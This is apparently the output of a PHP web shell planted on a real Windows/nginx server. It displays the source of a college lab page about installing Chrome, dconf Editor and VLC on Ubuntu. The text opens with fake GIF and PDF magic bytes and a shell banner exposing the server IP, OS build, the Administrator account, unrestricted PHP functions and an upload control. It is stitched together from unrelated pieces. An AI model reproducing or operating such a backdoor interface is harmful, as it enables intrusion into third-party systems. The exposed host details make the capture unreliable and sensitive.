GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2505/Labs/Lab06/ |
Upload File : |
<? // JimMartinson/CST2505/Labs/Lab06/Lab06.phpinc $js .= ',./Lab06.js'; require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. $disabled = ''; $disabled = ' disabled'; // Comment this line to enable lab. ?> <fieldset><legend>Description</legend> The purpose of this lab is to demonstrate your ability to install various application software. <br>The software will be installed using three methods: <b>dpkg</b>, <b>apt</b>, and <b>Ubuntu Software</b>. <?=$gradeNote?> <? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <fieldset><legend>Lab Instruction</legend> Create a <b class="copyText"><?=$evaluationName?></b> folder and keep all screenshots and any copied files for this assignment in that <b><?=$evaluationName?></b> folder. <ol class="count"> <li>Install the Google Chrome Browser. This will be done by downloading a deb package and the <b>dpkg</b> command. <ol> <li>Open a web browser and search for <samp class="copyText">Google Chrome browser</samp>.</li> <li>Find a download result and: <ol> <li>Click on <b>Download Chrome</b></li> <li>Ensure the correct version is selected and click on <b>Accept and Install</b>.</li> <li>Select <b>Save File</b> and click <b>OK</b>.</li> <li>Select your <b>Downloads</b> folder and click <b>Save</b>.</li> </ol> </li> <li>Open a <b>Terminal window</b>.</li> <li><kbd>cd</kbd> to Your <b>Downloads</b> folder. <br> <span class="note">Enter the name of the google chrome file here to update instructions: <input id="name_of_the_google_chrome_file" onInput="CopyGoogleChrome(this);" placeholder="name_of_the_google_chrome_file" value="" style="width:20em;"></span> </li> <li>Run the command <kbd class="copyText">sudo dpkg -i <span class="entry" id="name_of_the_google_chrome_file_1">name_of_the_google_chrome_file</span></kbd>.</li> <li> Take a screenshot of the Terminal window and save it as <b class="copyText" style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>-ChromeTerminal-<?=$userFileName?>.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/ChromeTerminal.png" width="734" height="488" alt="Chrome example screenshot"><br> <? showEnd (); ?> <span class="note display_block">If you miss the screenshot you will have to uninstall the Google chrome browser and then re-install it. You can delete it with: <br><kbd class="copyText">sudo apt --purge remove google-chrome-stable</kbd> <br>--or-- <kbd class="copyText">sudo dpkg --remove google-chrome-stable</kbd> <br>--or-- <kbd class="copyText">sudo dpkg --r <span class="entry" id="name_of_the_google_chrome_file_2">name_of_the_google_chrome_file</span></kbd> <br>If the package was broken or failed to install correctly your can fix this with: <ul> <li><kbd>sudo apt clean && sudo apt autoremove</kbd></li> <li><kbd>sudo apt -f install</kbd></li> <li><kbd>sudo dpkg --configure -a</kbd></li> <li>Then re-download the package and install it.</li> </ul> </span> </li> <li>Run the Google Chrome Browser.</li> <li>Open <b>Help</b>/<b>About Google Chrome</b>.</li> <li> Take a screenshot of the Google Chrome Browser window and save it as <b class="copyText" style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>-ChromeWindow-<?=$userFileName?>.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/ChromeWindow.png" width="900" height="656" alt="Chrome example screenshot"><br> <? showEnd (); ?> </li> </ol> </li> <li> Install the dconf Editor. This will be done using the <b>apt</b> command. <ol> <li>Open a <b>Terminal window</b>.</li> <li>Install the <b>dconf Editor</b> with apt: <kbd class="copyText">sudo apt install dconf-editor</kbd>.</li> <li>Run the dconf Editor.</li> <li> Take a screenshot of the dconf Editor window and save it as <b class="copyText" style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>-dconf-<?=$userFileName?>.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/dconf.png" width="800" height="634" alt="dconf example screenshot" style="border:1px solid silver; "><br> <? showEnd (); ?> </li> </ol> </li> <li> Install VLC media player. This will be done using <b>Ubuntu Software</b>. <ol> <li>Open <b>Ubuntu Software</b>.</li> <li>Search for <b>VLC</b>.</li> <li>Install the <b>VLC media player</b>. Use the one with the name <b>VLC media player</b> and the star rating. <br><img src="images/VLC.png" width="838" height="100" alt="VLC media player"> </li> <li>Download and save the <a href="paddle-steamer.mp4" download="paddle-steamer.mp4">paddle-steamer.mp4</a> video file.</li> <li>Open the paddle-steamer.mp4 file in VLC media player and play it.</li> <li> Take a screenshot of the VLC media player window playing the video and save it as <b class="copyText" style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>-VLC-<?=$userFileName?>.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/VLC_paddle-steamer.png" width="489" height="310" alt="VLC media player example screenshot"><br> <? showEnd (); ?> </li> </ol> </li> <li>Turn in your assignment: <ol type="a"> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder: <ol type="a"> <li><?=$courseNumber?>-<?=$evaluationName?>-ChromeTerminal-<?=$userFileName?>.png.</li> <li><?=$courseNumber?>-<?=$evaluationName?>-ChromeWindow-<?=$userFileName?>.png.</li> <li><?=$courseNumber?>-<?=$evaluationName?>-dconf-<?=$userFileName?>.png.</li> <li><?=$courseNumber?>-<?=$evaluationName?>-VLC-<?=$userFileName?>.png.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b class="copyText"><?=$uploadFilename?></b>.</li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li> </ol> </li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. #require('../../ReferencesResources.phpinc'); #require($Instructor['Path'].'/ContactInformation.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>